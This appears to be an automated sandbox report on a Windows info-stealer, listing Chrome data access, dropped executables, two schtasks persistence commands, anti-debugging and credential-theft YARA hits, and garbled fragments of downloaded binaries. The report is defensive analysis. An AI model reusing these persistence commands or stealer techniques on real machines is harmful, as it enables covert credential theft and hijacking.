file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gojhcdgcpbpfigcaejpfhfegekdgiblk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Sync Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka\CURRENT

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (5 events)

file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\orO_4WECHYgkaMJSLpQM.exe
file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\sbQkWyxbcah1ikaoMbtb.exe
file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\6Lfr2_JvDPSQIOljUsEY.exe
file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\y2p55fFqEFlCcZ1qkquc.exe
file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\PXsW3OSySmisXJvS2lh2.exe

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW Feb. 16, 2024, 7:57 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Windows\System32\GroupPolicy filepath: C:\Windows\System32\GroupPolicy	1	1	0

Creates a suspicious process (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Drops a binary and executes it (5 events)

file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\orO_4WECHYgkaMJSLpQM.exe
file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\PXsW3OSySmisXJvS2lh2.exe
file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\sbQkWyxbcah1ikaoMbtb.exe
file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\6Lfr2_JvDPSQIOljUsEY.exe
file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\y2p55fFqEFlCcZ1qkquc.exe

Drops an executable to the user AppData folder (5 events)

file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\sbQkWyxbcah1ikaoMbtb.exe
file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\PXsW3OSySmisXJvS2lh2.exe
file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\6Lfr2_JvDPSQIOljUsEY.exe
file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\orO_4WECHYgkaMJSLpQM.exe
file	C:\Users\test22\AppData\Local\Temp\heidirNjfZiCfxizH\y2p55fFqEFlCcZ1qkquc.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Feb. 16, 2024, 7:57 a.m.	thread_identifier: 2788 thread_handle: 0x0000019c process_identifier: 2784 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001b8	1	1	0
CreateProcessInternalW Feb. 16, 2024, 7:57 a.m.	thread_identifier: 2860 thread_handle: 0x000001c0 process_identifier: 2856 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001bc	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (1 event)

Time & API	Arguments	Status	Return	Repeated
Process32NextW Feb. 16, 2024, 7:57 a.m.	snapshot_handle: 0x0000051c process_name: taskhost.exe process_identifier: 2360	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Feb. 16, 2024, 7:58 a.m.	process_identifier: 1400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x049c0000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process bugai.exe (5 events)

Time & API	Arguments	Status	Return
InternetReadFile Feb. 16, 2024, 7:57 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPEL^Îeà"¬ RwÀ @`î@@@d\|@ pà uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrcp@ ô@@.relocuà v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 16, 2024, 7:58 a.m.	buffer: MZÿÿ¸@zº´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà"0$ E `@ Ee`m`ø @ @à.rsrc`2@À.idata 6@À @* 8@àangnnfkh à*:@àuicknxup EL@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 16, 2024, 7:58 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PELþ~Ìeà"¬>Øü°À@ ±@ Pµ Ø]x P°4@àpÀ"8@à@0Z@àpb@àdb@à.rsrcÆ@@y (Ô @à.data" ò!ü@àJ0¤¿'Ó oë$8 <¯áªO«éSSö½Ð0+Ð?m6Ìs/M% Ù@f»ÀÚþBiÀõwàþ!Øô¹Îv XÖ¥!î<âÒ¦ñ§íäóÒ¹I÷½DXm~47¹@u»·qcg.Ådbr¦)fñvÜ~ñÈòÿAÒDÌÖeifÑú; tfÀf8k£õ¤XhØä÷~¼×ç aAÛI>ÆÃ/¨ÔrJrcle¸?iþn&RU=¨¦Z;¡ññµ^%A%ÑRtßåeBöäK"¡ ×Øm/ºK÷½f~ 5hUgcÀCuÒ0Ô!Æjôæv§p.®ãöà¥ÅÔbêV8©îºsõ/ ¡$êUâäõY(ígS7%:kPY²OÙ¯.óðucBÕl¹V¢9&ÀOOÐ×¢uÍõÓG5Doac;,)Ö&\|åÈ±ë¡°{àF(jþswk¾ÓÛ¹h¶nÊê?µ¯f{-ïa"únÁÞkþFgµþR½+I8DÙ¿²·ÆS Þ»¡qpWKî®8itvöqÕz$g¨¶ÑFÅi]\ÐÈð,À:S l¿Y©áTêó ýýâÆ]OÁ÷gqf,v:W[V«KÂîBp»õE[$ªÇ²Z ,Õ¸Ã¤ëqNtôB³ð#5?eõ-cá?¾ã~ã{ýèåóÌSÄÑÆYå²îxò9³§mXÑçÄëÿmuÀ QÞt·û;1ß³§SÝ'ÞÔMkm¶¢ï»hëd,ÿÞÜ-üÈ@¨G.â»LZ£DÁúá>Óì:'=µ#oW-X`®´Ú¼ã?Ô%]]i}Õÿ!1sø©ó·qàUoºÄJ ÂR§ pÖíÎ¢ïðMÒåR?ëBôyÒ,RßaÍ< ¤5&w,±Ý:ì¡!¢ÿpõ²Úî~JMd$În1uhÜÁâÌLÈ3qÊÀ)IÞÙÄ3ÚR2Ö=Í$6q$¬{®ÛûÛUüÏÕ.¥4Ú8´K$¶Y¨]¦rÓ$tT2+q¶²NFµ ¾ZÁÁ&ZMZZ¡ÓM¬°^ÐKWÕF=ÒþN¿æåú%2ÓZDÕûqHÍi¹´¢~Á¬VÄöÉë#ì{ request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 16, 2024, 7:58 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëìº¸ìº¸ìº¸L¹¹ ìº¸L¿¹Æìº¸L½¹ìº¸HG¸ìº¸H¾¹ìº¸H¹¹ìº¸H¿¹Rìº¸L¾¹ìº¸L¼¹ìº¸L»¹ìº¸ì»¸íº¸Ì³¹ìº¸ÌE¸ìº¸ì-¸ìº¸Ì¸¹ìº¸Richìº¸PEL»eà"VÀZ°@ðZÎ#@W°k`°Cø± Pè@à.rsrc°C`ø@À.idata ° @À `,À @àbwqzpaea @ @àkfdwxvhs°Z#@à.taggant0ÀZ"¢#@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 16, 2024, 7:58 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPEL`Îeà"¬ wÀ @0Í@@@d\|@ \|a°uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrc\|a@ bô@@.relocu°vV@B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (4 events)

section

{u'size_of_data': u'0x0008f000', u'virtual_address': u'0x00001000', u'entropy': 7.986756957377487, u'name': u' \\x00 ', u'virtual_size': u'0x00136000'}

entropy

7.98675695738

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00002000', u'virtual_address': u'0x00137000', u'entropy': 7.905908888905603, u'name': u'.rsrc', u'virtual_size': u'0x000110a0'}

entropy

7.90590888891

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x001b4c00', u'virtual_address': u'0x00407000', u'entropy': 7.91197063893426, u'name': u'vwrytnqv', u'virtual_size': u'0x001b5000'}

entropy

7.91197063893

description

A section with a high entropy has been found

entropy

0.99550802139

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Feb. 16, 2024, 7:58 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (1 event)

process

system

Potentially malicious URLs were found in the process memory dump (50 out of 1134 events)

url	https://crashpad.chromium.org/bug/new
url	https://crashpad.chromium.org/
url	https://clients4.google.com/invalidation/android/request/
url	http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
url	http://services.ukrposhta.com/postindex_new/
url	http://dts.search-results.com/sr?lng=
url	http://inposdom.gob.do/codigo-postal/
url	http://creativecommons.org/ns
url	http://www.postur.fo/
url	https://qc.search.yahoo.com/search?ei=
url	https://cacert.omniroot.com/baltimoreroot.crt09
url	https://codereview.chromium.org/25305002).
url	https://search.yahoo.com/search?ei=
url	http://t1.symcb.com/ThawtePCA.crl0/
url	http://crbug.com/31395.
url	https://support.google.com/chrome/answer/165139
url	https://ct.googleapis.com/aviator/
url	https://datasaver.googleapis.com/v1/clientConfigs
url	http://crl.starfieldtech.com/sfroot-g2.crl0L
url	https://ct.startssl.com/
url	https://suggest.yandex.com.tr/suggest-ff.cgi?part=
url	https://de.search.yahoo.com/favicon.ico
url	https://github.com/GoogleChrome/Lighthouse/issues
url	http://www.searchnu.com/favicon.ico
url	https://support.google.com/installer/?product=
url	http://msdn.microsoft.com/en-us/library/ms792901.aspx
url	https://www.najdi.si/search.jsp?q=
url	http://x.ss2.us/x.cer0
url	http://crl.geotrust.com/crls/gtglobal.crl04
url	https://accounts.google.com/ServiceLogin
url	https://accounts.google.com/OAuthLogin
url	https://c.android.clients.google.com/
url	https://www.google.com/tools/feedback/chrome/__submit
url	https://chrome.google.com/webstore/category/collection/dark_themes
url	http://check.googlezip.net/generate_204
url	http://ocsp.starfieldtech.com/08
url	http://www.guernseypost.com/postcode_finder/
url	http://crl.certum.pl/ca.crl0h
url	http://ator
url	https://suggest.yandex.by/suggest-ff.cgi?part=
url	http://feed.snap.do/?q=
url	https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
url	http://www.language
url	https://support.google.com/chrome/
url	http://developer.chrome.com/apps/declare_permissions.html
url	http://www.google.com/chrome/intl/ko/eula_text.html
url	https://www.globalsign.com/repository/03
url	http://www.startssl.com/sfsca.crl0
url	http://UA-Compatible
url	https://se.search.yahoo.com/search?ei=

Yara rule detected in process memory (50 out of 941 events)

description	Match Windows Http API call	rule	Str_Win32_Http_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Client_SW_User_Data_Stealer	rule	Client_SW_User_Data_Stealer
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	browser info stealer	rule	infoStealer_browser_Zero
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Perform crypto currency mining	rule	BitCoin
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Possibly employs anti-virtualization techniques	rule	vmdetect
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Virtual currency	rule	Virtual_currency_Zero

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x0000051c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000524 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000524 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000524 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000524 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000520 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 16, 2024, 7:57 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000528 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
